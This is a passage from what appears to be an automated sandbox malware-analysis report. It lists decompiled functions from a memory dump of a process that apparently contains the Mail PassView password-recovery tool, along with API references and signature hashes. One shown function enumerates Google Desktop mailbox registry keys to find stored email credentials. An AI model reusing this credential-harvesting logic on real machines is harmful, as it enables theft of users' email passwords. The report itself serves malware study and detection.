                                                                                              0x0040b12d
                                                                                              0x0040b136
                                                                                              0x0040b13e
                                                                                              0x0040b13e
                                                                                              0x0040b144
                                                                                              0x0040b149
                                                                                              0x0040b14b
                                                                                              0x0040b14b
                                                                                              0x0040b150
                                                                                              0x0040b155
                                                                                              0x0040b157
                                                                                              0x0040b157
                                                                                              0x0040b15c
                                                                                              0x0040b161
                                                                                              0x0040b165
                                                                                              0x0040b165
                                                                                              0x0040b170
                                                                                              0x0040b178
                                                                                              0x0040b17e
                                                                                              0x0040b17e
                                                                                              0x0040b189
                                                                                              0x0040b18d
                                                                                              0x0040b18d
                                                                                              0x0040b198
                                                                                              0x0040b1a3
                                                                                              0x0040b1ab
                                                                                              0x0040b1bc
                                                                                              0x0040b1c1
                                                                                              0x0040b1c5
                                                                                              0x0040b1cf
                                                                                              0x0040b1d2
                                                                                              0x0040b1d3
                                                                                              0x0040b1e4
                                                                                              0x0040b1ea
                                                                                              0x0040b1ee
                                                                                              0x0040b1f3
                                                                                              0x0040b1f3
                                                                                              0x0040b1f5
                                                                                              0x0040b1f9
                                                                                              0x0040b1fe
                                                                                              0x0040b202
                                                                                              0x0040b202
                                                                                              0x0040b20c
                                                                                              0x0040b23d
                                                                                              0x0040b23d
                                                                                              0x0040b242
                                                                                              0x0040b268
                                                                                              0x0040b268
                                                                                              0x0040b26d
                                                                                              0x0040b271
                                                                                              0x0040b271
                                                                                              0x0040b276
                                                                                              0x0040b27b
                                                                                              0x0040b27d
                                                                                              0x0040b285
                                                                                              0x0040b28b
                                                                                              0x0040b29d
                                                                                              0x0040b29e
                                                                                              0x0040b2a3
                                                                                              0x0040b2a3
                                                                                              0x0040b2a3
                                                                                              0x0040b2a5
                                                                                              0x0040b2ab
                                                                                              0x0040b2b0
                                                                                              0x0040b2b0
                                                                                              0x0040b2b5
                                                                                              0x0040b2bb
                                                                                              0x0040b2c3
                                                                                              0x0040b2c7
                                                                                              0x0040b2c9
                                                                                              0x0040b2ce
                                                                                              0x0040b2e1
                                                                                              0x0040b2e1
                                                                                              0x0040b2e7
                                                                                              0x0040b2ed
                                                                                              0x0040b2f3
                                                                                              0x0040b2f3
                                                                                              0x0040b2f8
                                                                                              0x0040b2fe
                                                                                              0x0040b306
                                                                                              0x0040b30f
                                                                                              0x0040b329
                                                                                              0x0040b330
                                                                                              0x0040b334
                                                                                              0x0040b339
                                                                                              0x0040b339
                                                                                              0x0040b33d
                                                                                              0x0040b343
                                                                                              0x0040b34b
                                                                                              0x0040b34b
                                                                                              0x0040b350
                                                                                              0x0040b356
                                                                                              0x0040b364
                                                                                              0x0040b364
                                                                                              0x00000000
                                                                                              0x0040b356
                                                                                              0x0040b244
                                                                                              0x0040b24a
                                                                                              0x0040b250
                                                                                              0x0040b263
                                                                                              0x00000000
                                                                                              0x0040b263
                                                                                              0x0040b252
                                                                                              0x0040b257
                                                                                              0x00000000
                                                                                              0x0040b20e
                                                                                              0x0040b20e
                                                                                              0x0040b21a
                                                                                              0x0040b238
                                                                                              0x00000000
                                                                                              0x0040b238
                                                                                              0x0040b21c
                                                                                              0x0040b221
                                                                                              0x0040b226
                                                                                              0x0040b226
                                                                                              0x0040b228
                                                                                              0x00000000
                                                                                              0x0040b228
                                                                                              0x0040b369
                                                                                              0x0040b369
                                                                                              0x0040b36f
                                                                                              0x0040b36f

                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?), ref: 0040B13E
                                                                                              • SetFocus.USER32(?,?,?), ref: 0040B1E4
                                                                                              • InvalidateRect.USER32(?,00000000,00000000), ref: 0040B2E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DestroyFocusInvalidateRectWindow
                                                                                              • String ID: `5A
                                                                                              • API String ID: 3502187192-343712130
                                                                                              • Opcode ID: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                              • Instruction ID: 7dc3b259c8ef6dbe6f4b6ee630ad47b8a618685bd7b93527759b10f323b3e488
                                                                                              • Opcode Fuzzy Hash: 4c3d990881eba3cf74bda8571d7f9b3248234962b7985cf1d53a89f59e718e54
                                                                                              • Instruction Fuzzy Hash: 2B519130A043019BCB25BF658845E9AB3E0EF54724F44C57FF4696F2E1CB7999818B8E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405CEE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 91%
                                                                                              			E00405CEE(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t29;
				struct HDWP__* _t30;
				RECT* _t58;
				intOrPtr _t66;

				_push(__ecx);
				_push(__ecx);
				_t66 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0x24) {
						if(_a4 == 0xf) {
							E0040173B(__ecx + 0xc);
						}
					} else {
						_t29 = _a12;
						 *((intOrPtr*)(_t29 + 0x18)) = 0x190;
						 *((intOrPtr*)(_t29 + 0x1c)) = 0xb4;
					}
				} else {
					_t30 = BeginDeferWindowPos(0xb);
					_t58 = _t66 + 0xc;
					_v8 = _t30;
					E0040169B(_t58, _t30, 0x3ed, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ee, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f4, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3ef, 0, 0, 1);
					E0040169B(_t58, _v8, 0x3f0, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f1, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f5, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f2, 1, 0, 0);
					E0040169B(_t58, _v8, 0x3f3, 1, 1, 0);
					E0040169B(_t58, _v8, 1, 1, 1, 0);
					E0040169B(_t58, _v8, 2, 1, 1, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t58 + 0x10), _t58, 1);
					_t66 = _v12;
				}
				return E004015AE(_t66, _a4, _a8, _a12);
			}










                                                                                              0x00405cf1
                                                                                              0x00405cf2
                                                                                              0x00405cf9
                                                                                              0x00405cfb
                                                                                              0x00405cfe
                                                                                              0x00405df3
                                                                                              0x00405e0c
                                                                                              0x00405e11
                                                                                              0x00405e11
                                                                                              0x00405df5
                                                                                              0x00405df5
                                                                                              0x00405df8
                                                                                              0x00405dff
                                                                                              0x00405dff
                                                                                              0x00405d04
                                                                                              0x00405d07
                                                                                              0x00405d0f
                                                                                              0x00405d1d
                                                                                              0x00405d23
                                                                                              0x00405d35
                                                                                              0x00405d47
                                                                                              0x00405d59
                                                                                              0x00405d6b
                                                                                              0x00405d7d
                                                                                              0x00405d8f
                                                                                              0x00405da1
                                                                                              0x00405db3
                                                                                              0x00405dc1
                                                                                              0x00405dd0
                                                                                              0x00405dd8
                                                                                              0x00405de3
                                                                                              0x00405de9
                                                                                              0x00405dec
                                                                                              0x00405e29

                                                                                              APIs
                                                                                              • BeginDeferWindowPos.USER32 ref: 00405D07
                                                                                                • Part of subcall function 0040169B: GetDlgItem.USER32 ref: 004016AB
                                                                                                • Part of subcall function 0040169B: GetClientRect.USER32 ref: 004016BD
                                                                                                • Part of subcall function 0040169B: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00401727
                                                                                              • EndDeferWindowPos.USER32(?), ref: 00405DD8
                                                                                              • InvalidateRect.USER32(?,?,00000001), ref: 00405DE3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                              • String ID: $
                                                                                              • API String ID: 2498372239-3993045852
                                                                                              • Opcode ID: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                              • Instruction ID: 46e20a5f719da2480e3b09a58904212cef45bdfb275aa5f1a4c21840a4711c1e
                                                                                              • Opcode Fuzzy Hash: eed8279c3271f2b27814900a34917ae49580b819969905b4e3b00ee4e388fd63
                                                                                              • Instruction Fuzzy Hash: EB316D30641254BBCB216F13DD49D9F3F7CEF86BA4F10483DB409762A1C6798E10DAA8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040719C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040719C(void* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				char _v264;
				void* _v268;
				void* _v276;
				long _t17;
				void* _t21;
				void* _t24;
				void* _t29;
				int _t32;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t41;

				_t29 = __ecx;
				_t17 = E0040EB3F(0x80000001, "Software\\Google\\Google Desktop\\Mailboxes",  &_v268);
				_t39 = (_t36 & 0xfffffff8) - 0x108 + 0xc;
				if(_t17 == 0) {
					_t32 = 0;
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_t40 = _t39 + 0xc;
					_t21 = E0040EC05(_v268, 0,  &_v260);
					while(1) {
						_t41 = _t40 + 0xc;
						if(_t21 != 0) {
							break;
						}
						_t24 = E0040EB3F(_v268,  &_v260,  &_v264);
						_t40 = _t41 + 0xc;
						if(_t24 == 0) {
							E0040706C(_t29, _a4, _v264,  &_v260);
							RegCloseKey(_v276);
						}
						_t32 = _t32 + 1;
						_t21 = E0040EC05(_v268, _t32,  &_v260);
					}
					_t17 = RegCloseKey(_v268);
				}
				return _t17;
			}

















                                                                                              0x0040719c
                                                                                              0x004071b9
                                                                                              0x004071be
                                                                                              0x004071c3
                                                                                              0x004071ca
                                                                                              0x004071d2
                                                                                              0x004071d7
                                                                                              0x004071dc
                                                                                              0x004071e9
                                                                                              0x00407237
                                                                                              0x00407237
                                                                                              0x0040723c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407204
                                                                                              0x00407209
                                                                                              0x0040720e
                                                                                              0x0040721c
                                                                                              0x00407225
                                                                                              0x00407225
                                                                                              0x0040722c
                                                                                              0x00407232
                                                                                              0x00407232
                                                                                              0x00407242
                                                                                              0x00407242
                                                                                              0x00407249

                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              • memset.MSVCRT ref: 004071D7
                                                                                                • Part of subcall function 0040EC05: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 0040EC28
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407225
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 00407242
                                                                                              Strings
                                                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 004071AF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$EnumOpenmemset
                                                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                              • API String ID: 2255314230-2212045309
                                                                                              • Opcode ID: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                              • Instruction ID: abca04dfe3767426288f52b4a512d9ce3e2bfadbcd13eaa8a3c626f28e0c8a54
                                                                                              • Opcode Fuzzy Hash: 452db49ed067e6e6e63c10348168c8f88923fb1a9b6aea3e0d2cfe22e4762b25
                                                                                              • Instruction Fuzzy Hash: A71142728083456BD710EE52DC01EAB7BECEB84344F04093EF995E1191E735E628DAA7
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B70A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38registryCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040B70A(void* __esi) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t15;
				struct HWND__* _t20;

				_t15 =  *0x416b94; // 0x400000
				_v44.hInstance = _t15;
				_v44.hIcon =  *((intOrPtr*)(__esi + 0x104));
				_v44.lpszClassName = __esi + 4;
				_v44.style = 0;
				_v44.lpfnWndProc = E004017C1;
				_v44.cbClsExtra = 0;
				_v44.cbWndExtra = 0;
				_v44.hCursor = 0;
				_v44.hbrBackground = 0x10;
				_v44.lpszMenuName = 0;
				RegisterClassA( &_v44);
				_t20 = CreateWindowExA(0, "MailPassView", "Mail PassView", 0xcf0000, 0, 0, 0x280, 0x1e0, 0, 0,  *0x416b94, __esi);
				 *(__esi + 0x108) = _t20;
				return _t20;
			}






                                                                                              0x0040b710
                                                                                              0x0040b715
                                                                                              0x0040b71e
                                                                                              0x0040b727
                                                                                              0x0040b72e
                                                                                              0x0040b731
                                                                                              0x0040b738
                                                                                              0x0040b73b
                                                                                              0x0040b73e
                                                                                              0x0040b741
                                                                                              0x0040b748
                                                                                              0x0040b74b
                                                                                              0x0040b776
                                                                                              0x0040b77c
                                                                                              0x0040b784

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassCreateRegisterWindow
                                                                                              • String ID: Mail PassView$MailPassView
                                                                                              • API String ID: 3469048531-1277648965
                                                                                              • Opcode ID: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                              • Instruction ID: f223c9819260e0b75888b36d0bfde8daf7ba5992c102a2aca34afaaeb944facf
                                                                                              • Opcode Fuzzy Hash: 7d9b3190e156b9bfff027be3e0f607fb910863f17b47cbf685ca248547ef7640
                                                                                              • Instruction Fuzzy Hash: 3601ECB5D01248ABDB10CF96CD45ADFFFF8EB99B00F10812AE555F2250D7B46544CB68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00401085(void* __esi, void* __eflags) {
				struct tagLOGFONTA _v64;
				int _t10;
				long _t11;

				E00406191( &_v64, "MS Sans Serif", 0xa, 1);
				_t10 = CreateFontIndirectA( &_v64);
				 *(__esi + 0x20c) = _t10;
				_t11 = SendDlgItemMessageA( *(__esi + 4), 0x3ec, 0x30, _t10, 0);
				if( *0x417388 != 0) {
					return SendDlgItemMessageA( *(__esi + 4), 0x3ee, 0x30,  *(__esi + 0x20c), 0);
				}
				return _t11;
			}






                                                                                              0x00401098
                                                                                              0x004010a4
                                                                                              0x004010bd
                                                                                              0x004010c3
                                                                                              0x004010cc
                                                                                              0x00000000
                                                                                              0x004010e0
                                                                                              0x004010e4

                                                                                              APIs
                                                                                                • Part of subcall function 00406191: memset.MSVCRT ref: 0040619B
                                                                                                • Part of subcall function 00406191: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406269,Arial,0000000E,00000000), ref: 004061DB
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004010A4
                                                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 004010C3
                                                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 004010E0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ItemMessageSend$CreateFontIndirectmemsetstrcpy
                                                                                              • String ID: MS Sans Serif
                                                                                              • API String ID: 4251605573-168460110
                                                                                              • Opcode ID: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                              • Instruction ID: 11d026e54a5ae2454c64c325e08d9e616df03e05f7163fa19ba200447038793b
                                                                                              • Opcode Fuzzy Hash: a5c1b06fa8ac567c51537cce04f23f48b3e0294f7b0701913d9bb68d384747bd
                                                                                              • Instruction Fuzzy Hash: 73F0A775A8034877E72167A0ED47F8A7BACAB40B00F10C135FB61B51E1D6F47554DB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040DE43, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040DE43(void** __eax, struct HWND__* _a4) {
				int _t6;
				void** _t10;

				_t10 = __eax;
				if( *0x417510 == 0) {
					memcpy(0x416e70,  *__eax, 0x50);
					memcpy(0x416ba0,  *(_t10 + 4), 0x2cc);
					 *0x417510 = 1;
					_t6 = DialogBoxParamA( *0x416b94, 0x6b, _a4, E0040DB39, 0);
					 *0x417510 =  *0x417510 & 0x00000000;
					 *0x416b9c = _t6;
					return 1;
				} else {
					return 1;
				}
			}





                                                                                              0x0040de4b
                                                                                              0x0040de4d
                                                                                              0x0040de5d
                                                                                              0x0040de6f
                                                                                              0x0040de8d
                                                                                              0x0040de93
                                                                                              0x0040de99
                                                                                              0x0040dea0
                                                                                              0x0040dea8
                                                                                              0x0040de4f
                                                                                              0x0040de53
                                                                                              0x0040de53

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: memcpy$DialogParam
                                                                                              • String ID: V7
                                                                                              • API String ID: 392721444-2959985473
                                                                                              • Opcode ID: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                              • Instruction ID: 1a8743d5fef8bbef7923f2c95fec7d45d4f15d0a806a7122114c86eec2fd18b9
                                                                                              • Opcode Fuzzy Hash: 5e9eade56f70dddb9201fe9d43162507361263185449feca73d32e9d96fafbc6
                                                                                              • Instruction Fuzzy Hash: 93F0A7716843207BD7116F54AC06BC63BF2B704B5AF114926F149E40E1D3F56550CBCC
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004062D1, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 58%
                                                                                              			E004062D1(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				_push("edit");
				_push(_t10);
				L004115B2();
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                                                                              0x004062ea
                                                                                              0x004062f1
                                                                                              0x00406304
                                                                                              0x0040630a
                                                                                              0x00406310
                                                                                              0x00406315
                                                                                              0x00406316
                                                                                              0x0040631f
                                                                                              0x00406324

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004062F1
                                                                                              • GetClassNameA.USER32(?,00000000,000000FF), ref: 00406304
                                                                                              • _stricmp.MSVCRT(00000000,edit), ref: 00406316
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ClassName_stricmpmemset
                                                                                              • String ID: edit
                                                                                              • API String ID: 3665161774-2167791130
                                                                                              • Opcode ID: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                              • Instruction ID: 6efc07277a00def775dca084f59963aaad452a70fda198cb5006c56c80a8bddd
                                                                                              • Opcode Fuzzy Hash: f6364a9e82c342bcd76c39a965b38e05be617d7d52f0a224c2f99095176bc218
                                                                                              • Instruction Fuzzy Hash: 75E09BB3C4412A7ADB21A764DC05FE53BAC9F59305F0001B6BD46E10D5E5B497C887A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040EDAC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040EDAC() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x417520 == 0) {
					_t1 = LoadLibraryA("shell32.dll");
					 *0x417520 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathA");
						 *0x41751c = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                              0x0040edb3
                                                                                              0x0040edba
                                                                                              0x0040edc2
                                                                                              0x0040edc7
                                                                                              0x0040edcf
                                                                                              0x0040edd5
                                                                                              0x00000000
                                                                                              0x0040edd5
                                                                                              0x0040edc7
                                                                                              0x0040edda

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(shell32.dll,0040B9D8,75144DE0,?,00000000), ref: 0040EDBA
                                                                                              • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 0040EDCF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                              • API String ID: 2574300362-543337301
                                                                                              • Opcode ID: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                              • Instruction ID: 9298da647e7f97f850720a93b521a1101e1548fa407b312faad19db7241a3124
                                                                                              • Opcode Fuzzy Hash: 8c8e9a4ff32791e3d6bd34cb9d8ce11c35f1ef255cc83771f6bc322d1b4004da
                                                                                              • Instruction Fuzzy Hash: 4BD0C970649202EFC7008F21AE097813ABABB18703F10C537A506E1AA0F7B88190CF5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040FE05, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E0040FE05(intOrPtr* __esi, void* __eflags) {
				void* _t27;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t44;

				_t44 = __esi;
				 *__esi = 0x414288;
				_t27 = E00406549(0x46c, __esi);
				_push(0x20);
				L004115D0();
				if(_t27 == 0) {
					_t28 = 0;
				} else {
					_t28 = E00406A2C(_t27);
				}
				_push(0x20);
				 *((intOrPtr*)(_t44 + 0x450)) = _t28;
				L004115D0();
				if(_t28 == 0) {
					_t29 = 0;
				} else {
					_t29 = E00406A2C(_t28);
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x454)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x458)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t44 + 0x45c)) = _t29;
				L004115D0();
				if(_t29 == 0) {
					_t29 = 0;
				} else {
					 *((intOrPtr*)(_t29 + 0xc)) = 0;
					 *_t29 = 0;
					 *((intOrPtr*)(_t29 + 4)) = 0;
					 *((intOrPtr*)(_t29 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t29 + 8)) = 0;
				}
				 *((intOrPtr*)(_t44 + 0x460)) = _t29;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x450)) + 0x14)) = 0x2000;
				 *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x454)) + 0x14)) = 0x2000;
				 *((intOrPtr*)(_t44 + 0x3c)) = 1;
				 *((intOrPtr*)(_t44 + 0x40)) = 1;
				 *((intOrPtr*)(_t44 + 0x44)) = 1;
				 *((intOrPtr*)(_t44 + 0x48)) = 1;
				return _t44;
			}







                                                                                              0x0040fe05
                                                                                              0x0040fe0d
                                                                                              0x0040fe13
                                                                                              0x0040fe18
                                                                                              0x0040fe1a
                                                                                              0x0040fe25
                                                                                              0x0040fe2e
                                                                                              0x0040fe27
                                                                                              0x0040fe27
                                                                                              0x0040fe27
                                                                                              0x0040fe30
                                                                                              0x0040fe32
                                                                                              0x0040fe38
                                                                                              0x0040fe40
                                                                                              0x0040fe49
                                                                                              0x0040fe42
                                                                                              0x0040fe42
                                                                                              0x0040fe42
                                                                                              0x0040fe4b
                                                                                              0x0040fe4d
                                                                                              0x0040fe53
                                                                                              0x0040fe60
                                                                                              0x0040fe72
                                                                                              0x0040fe62
                                                                                              0x0040fe62
                                                                                              0x0040fe65
                                                                                              0x0040fe67
                                                                                              0x0040fe6a
                                                                                              0x0040fe6d
                                                                                              0x0040fe6d
                                                                                              0x0040fe74
                                                                                              0x0040fe76
                                                                                              0x0040fe7c
                                                                                              0x0040fe84
                                                                                              0x0040fe96
                                                                                              0x0040fe86
                                                                                              0x0040fe86
                                                                                              0x0040fe89
                                                                                              0x0040fe8b
                                                                                              0x0040fe8e
                                                                                              0x0040fe91
                                                                                              0x0040fe91
                                                                                              0x0040fe98
                                                                                              0x0040fe9a
                                                                                              0x0040fea0
                                                                                              0x0040fea8
                                                                                              0x0040feba
                                                                                              0x0040feaa
                                                                                              0x0040feaa
                                                                                              0x0040fead
                                                                                              0x0040feaf
                                                                                              0x0040feb2
                                                                                              0x0040feb5
                                                                                              0x0040feb5
                                                                                              0x0040fec2
                                                                                              0x0040fecd
                                                                                              0x0040fed6
                                                                                              0x0040fedd
                                                                                              0x0040fee0
                                                                                              0x0040fee3
                                                                                              0x0040fee6
                                                                                              0x0040feec

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp Download File
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ??2@$memset
                                                                                              • String ID:
                                                                                              • API String ID: 1860491036-0
                                                                                              • Opcode ID: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                              • Instruction ID: d938b1c2a289ef47e5423cea375f2860c04713c819a512dfc676868f3ea794ac
                                                                                              • Opcode Fuzzy Hash: 7c91cc0c080fd5bb70578688ba928cc39a2670361b6ddd4e2d1e90fb004bc48b
                                                                                              • Instruction Fuzzy Hash: CC3146B0A107008FD7609F3AD845666FBE4EF80355F25887FD20ADB6B2E7B8D4448B59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040BD0B, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E0040BD0B(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040BD8A(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
				 *((intOrPtr*)(_t35 + 0x50)) =  *((intOrPtr*)(_t35 + 0x10));
				 *((intOrPtr*)(_t35 + 0x54)) =  *((intOrPtr*)(_t35 + 0x14));
				E0040BD8A(_t35 + 0x18, _t35);
				memcpy(_a4, _t35, 0x10);
				return memset(_t35, 0, 4);
			}










                                                                                              0x0040bd0b
